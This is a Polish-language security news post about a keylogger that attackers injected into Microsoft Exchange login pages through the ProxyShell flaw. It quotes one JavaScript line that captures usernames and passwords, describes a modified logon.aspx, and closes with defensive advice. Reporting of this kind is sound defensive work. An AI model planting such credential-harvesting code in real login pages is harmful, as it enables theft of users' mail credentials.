W dzisiejszym poście opiszemy ciekawy, nowo odkryty keylogger, który kradnie dane uwierzytelniające użytkowników ze strony logowania do poczty Microsoft Exchange.
Wyrafinowany keylogger odkryli eksperci z Security Center (PT ESC) w Positive Technologies podczas badania incydentu związanego z zaatakowanym serwerem Microsoft Exchange. Był on ukryty na stronie głównej serwera, służącej logowaniu do poczty. Problem stanowi poważne naruszenie bezpieczeństwa, wpływające na firmy i organy rządowe na całym świecie.
Szczegóły dotyczące keyloggera na Exchange
Szkodliwy kod został wykryty w funkcji clkLgn() strony głównej serwera.
Keylogger rejestruje dane uwierzytelniające, takie jak nazwy użytkowników i hasła, i przechowuje je w pliku, do którego można uzyskać dostęp za pośrednictwem określonej ścieżki internetowej. W ataku wykorzystano lukę ProxyShell – dobrze udokumentowany błąd w zabezpieczeniach serwerów Microsoft Exchange. Atakujący, wykorzystując ją, mogli wstrzyknąć kod keyloggera na stronę główną serwera.
Hakerzy wykorzystali następujący fragment kodu:
var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);Ponadto osoby atakujące zmodyfikowały plik „logon.aspx” w celu przetworzenia uzyskanych danych uwierzytelniających i przekierowania ich do pliku dostępnego przez Internet. Umożliwiło im to uzyskanie i wydobycie poufnych danych logowania w sposób niezauważony.
Źródło: Positive Technologies
Kod zainfekowanego pliku „logon.aspx”. Źródło: Positive Technologies.Dochodzenie wykazało, iż atak dotknął ponad 30 ofiar, z których większość stanowiły agencje rządowe. Wśród dotkniętych podmiotów znajdują się instytucje edukacyjne, korporacje i firmy informatyczne.
Ataki dotknęły różne kraje w Afryce i na Bliskim Wschodzie, takie jak Rosja, Zjednoczone Emiraty Arabskie, Kuwejt, Oman, Niger, Nigeria, Etiopia, Mauritius, Jordania i Liban.
Jak chronić się przed tego typu atakiem?
Positive Technologies powiadomiła wszystkie organizacje, których dotyczy problem, i zaleciła ograniczenie zagrożenia. Firmom korzystającym z serwerów Microsoft Exchange zaleca się:
- Sprawdzenie, czy serwer Exchange nie został skompromitowany – wyszukaj kod keyloggera na stronie głównej serwera Microsoft Exchange.
- Załatanie luk w zabezpieczeniach – upewnij się, iż wszystkie znane luki, w tym ProxyShell, są niezwłocznie załatane.
- Monitorowanie dzienników logów – regularnie monitoruj dzienniki serwera pod kątem nietypowej aktywności i prób nieautoryzowanego dostępu.
- Zwiększenie środków bezpieczeństwa – wdróż uwierzytelnianie wieloskładnikowe i inne zaawansowane środki bezpieczeństwa w celu ochrony przed kradzieżą danych uwierzytelniających.
Opisany incydent podkreśla najważniejsze znaczenie utrzymywania solidnych zabezpieczeń cybernetycznych i zachowania czujności wobec zmieniających się zagrożeń.
Ponieważ przestępcy w dalszym ciągu wykorzystują luki w powszechnie używanym oprogramowaniu, organizacje muszą nadać priorytet proaktywnym środkom bezpieczeństwa, aby chronić swoje wrażliwe informacje.
